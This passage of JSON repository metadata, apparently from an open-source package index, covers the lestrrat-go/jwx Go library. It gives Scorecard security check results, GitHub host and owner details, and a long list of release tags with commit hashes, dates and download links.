branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://rep